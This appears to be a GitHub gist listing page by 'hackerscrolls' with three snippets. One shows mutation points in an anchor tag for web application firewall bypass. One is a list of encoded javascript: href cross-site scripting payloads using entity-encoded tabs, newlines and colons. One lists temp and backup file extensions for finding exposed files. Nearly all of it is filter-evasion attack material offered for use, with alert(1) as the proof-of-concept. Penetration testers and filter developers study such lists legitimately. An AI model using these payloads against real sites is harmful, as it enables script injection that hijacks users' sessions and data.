Skip to content

Instantly share code, notes, and snippets.

View hackerscrolls's full-sized avatar

hackerscrolls

178 followers · 0 following
View GitHub Profile
@hackerscrolls
hackerscrolls / mutation_a.txt
Last active March 11, 2023 15:19
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
@hackerscrolls
hackerscrolls / href_bypass.html
Last active February 17, 2024 16:48
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
@hackerscrolls
hackerscrolls / extensions_temp_backup.txt
Created April 11, 2020 15:11
Common temp and backup extensions for files and directories by twitter.com/hackerscrolls
.0
.1
.2
.3
.tar
.tgz
.zip
.tar.gz
.rar
.cache